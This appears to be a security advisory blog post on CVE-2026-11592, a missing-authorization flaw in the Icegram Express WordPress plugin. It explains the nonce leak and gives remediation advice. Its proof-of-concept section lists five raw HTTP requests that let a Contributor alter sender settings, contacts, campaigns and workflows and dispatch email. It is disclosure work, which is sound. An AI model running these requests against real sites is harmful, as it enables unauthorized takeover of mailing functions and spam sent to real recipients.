CVE-2026-11592 affects Email Subscribers & Newsletters, also known as Icegram Express, through version 5.9.27. A Contributor can open the hidden es_template editor, read the shared ig-es-admin-ajax-nonce from ig_es_js_data.security, and reuse it against AJAX handlers that do not enforce an effective capability check. The exposed workflow permits unauthorized mail setting changes, audience and campaign manipulation, contact imports, persistent workflows, and immediate email dispatch. The issue is fixed in version 5.9.28.

CVECVE-2026-11592
Plugin VersionEmail Subscribers & Newsletters (Icegram Express) <= 5.9.27, fixed in 5.9.28
All Time13 030 589
Active installations50 000+
Publicly PublishedJuly 1, 2026
Last UpdatedJuly 2, 2026
ResearcherDmitrii Ignatyev
CWECWE-862 – Missing Authorization
PoCYes
ExploitNo
Referencehttps://www.cve.org/CVERecord?id=CVE-2026-11592
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers/email-subscribers-newsletters-5927-missing-authorization-to-authenticated-contributor-settings-modification-via-ig-es-handle-request-ajax-action
Plugin Security Certification by CleanTalk
Logo of the pluginIcegram Express plugin logo

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.

PSC by Cleantalk

Timeline

April 1, 2026Plugin testing and vulnerability detection in Icegram Express 5.9.24 were completed.
April 1, 2026The vulnerability report was sent to all relevant parties with the PoC, technical description, and recommendations for remediation.
July 1, 2026Wordfence publicly published the advisory for CVE-2026-11592.
July 2, 2026The CVE-2026-11592 record was published in the CVE Program registry.

Discovery of the Vulnerability

The issue was identified in Icegram Express 5.9.24. The plugin registers es_template with the standard post capability model, enables its editor UI, and only hides it from the plugin menu. A default Contributor who has edit_posts can therefore browse directly to /wp-admin/post-new.php?post_type=es_template. On that screen, Email_Subscribers_Admin::enqueue_scripts() localizes a global ig_es_js_data.security value created for ig-es-admin-ajax-nonce.

Possession of that nonce unlocks several authenticated AJAX handlers that rely on the nonce without enforcing the privilege needed for the operation. In the tested version, IG_ES_Onboarding::handle_request() validates security and dispatches the supplied request to a matching onboarding method without a capability check. The same pattern appears in broadcast drafting, contact import, workflow creation and status changes, template actions, and test email delivery.

The resulting access extends beyond one setting. A Contributor can overwrite sender details, create lists and contacts, alter or create newsletter content, configure forms and widgets, import audiences, add active workflows, queue campaigns, dispatch accumulated mail, and reset onboarding state so the sequence can be repeated. Wordfence classifies the issue as Medium with a CVSS score of 4.3 because the documented impact affects integrity and requires a low-privileged authenticated account.

Understanding of Missing Authorization attacks

A WordPress nonce is an anti-CSRF token. It shows that a request originated from a valid session in the expected time window, but it does not prove that the current user may perform the requested operation. Every privileged AJAX handler still needs a capability check that matches its side effect, such as managing plugin settings, campaigns, contacts, templates, or workflows.

Hiding a post type from the menu also does not restrict access to its editor URL. In this case, the hidden template screen exposes a reusable plugin nonce to Contributors, then many handlers treat that value as sufficient authorization. This is CWE-862 – Missing Authorization. The shared nonce broadens the flaw because one leaked value crosses several administrative features instead of protecting a single narrowly scoped operation.

Exploiting the Missing Authorization Vulnerability

The following non-destructive reproduction uses an isolated local site with Icegram Express 5.9.24, a default Contributor account, reserved example.test addresses, and outbound mail disabled or captured by a local mail sink. Replace the placeholders with values from that test session only.

POC:

POC:
1. Install and activate Icegram Express 5.9.24 on an isolated WordPress test site. Disable external mail delivery or use a local mail sink.
2. Sign in with a default Contributor account.
3. Open http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
4. Read ig_es_js_data.security from the page source or browser console.
5. Replace <IG_ES_NONCE> and <CONTRIBUTOR_SESSION_COOKIE> below with values from the isolated test session.
6. Send the following requests in order.

GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=perform_configuration_tasks&security=<IG_ES_NONCE>&es_from_name=Security%20Team&es_from_email=alerts%40example.test&enable_double_optin=no&emails[]=recipient1%40example.test&emails[]=recipient2%40example.test HTTP/1.1
Host: 127.0.0.1
Accept: application/json
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
X-Requested-With: XMLHttpRequest
Cookie: <CONTRIBUTOR_SESSION_COOKIE>

GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_draft_broadcast&security=<IG_ES_NONCE>&broadcast_data[id]=16&broadcast_data[subject]=Quarterly%20Update&broadcast_data[body]=%3Cp%3ELocal%20test%3C%2Fp%3E&broadcast_data[status]=1 HTTP/1.1
Host: 127.0.0.1
Accept: application/json
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
X-Requested-With: XMLHttpRequest
Cookie: <CONTRIBUTOR_SESSION_COOKIE>

GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=queue_default_broadcast_newsletter&security=<IG_ES_NONCE> HTTP/1.1
Host: 127.0.0.1
Accept: application/json
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
X-Requested-With: XMLHttpRequest
Cookie: <CONTRIBUTOR_SESSION_COOKIE>

GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=dispatch_emails_from_server&security=<IG_ES_NONCE> HTTP/1.1
Host: 127.0.0.1
Accept: application/json
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
X-Requested-With: XMLHttpRequest
Cookie: <CONTRIBUTOR_SESSION_COOKIE>

GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_send_workflow_action_test_email&security=<IG_ES_NONCE>&es_test_email=recipient%40example.test&subject=Local%20test&content=%3Cp%3EHello%3C%2Fp%3E&trigger=ig_es_user_subscribed&template=none&heading=Hi HTTP/1.1
Host: 127.0.0.1
Accept: application/json
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template
X-Requested-With: XMLHttpRequest
Cookie: <CONTRIBUTOR_SESSION_COOKIE>

7. As the test site administrator, confirm that the sender settings, lists, contacts, draft campaign, queue state, and locally captured test mail were changed by the Contributor session.

____

The requests use the same nonce extracted from the hidden template editor. The important result is that a default Contributor can reach side effects reserved for plugin administrators. The local mail sink keeps the reproduction contained while still confirming queue and delivery behavior.

Recommendations for Improved Security

Site owners should update Icegram Express to 5.9.28 or a later patched release, as specified in the advisory. Review sender settings, audience lists, imported contacts, campaigns, workflows, forms, widgets, and recent mail logs for unexpected changes. If an immediate update is not possible, disable the plugin until it can be patched and remove untrusted Contributor access from the affected site.

Developers should require an explicit WordPress capability before every privileged AJAX side effect and verify access to each referenced campaign, list, workflow, template, or settings group. Nonces should be narrowly scoped to the operation and should never replace authorization. Administrative scripts and their nonces must not load on screens reachable through generic edit_posts permission. State-changing operations should use POST requests, but the request method remains separate from capability enforcement.

Enforcing capability checks around CVE-2026-11592 prevents a Contributor from turning a shared admin nonce into control over Icegram Express settings, contacts, campaigns, workflows, and mail delivery. Applying the patched release closes this reported path.

#WordPressSecurity #MissingAuthorization #IcegramExpress #EmailSecurity #WebsiteSafety #StayProtected

Use CleanTalk solutions to improve the security of your website

CVE-2026-11592 – Icegram Express – Missing Authorization – POC

Dmitrii I

Pentester with 5 years of hands-on experience securing WordPress and web applications, holding OSWE, OSEP, OSCP, and OSWP certifications. Author of 450 published CVEs, including 35 disclosed within the last month. Specializes in discovering and validating high-impact vulnerabilities in WordPress plugins/themes / Custom WEB applications and delivering actionable remediation guidance to harden production sites.

Visit Author's Website

See all posts by dmitrii-ignatyev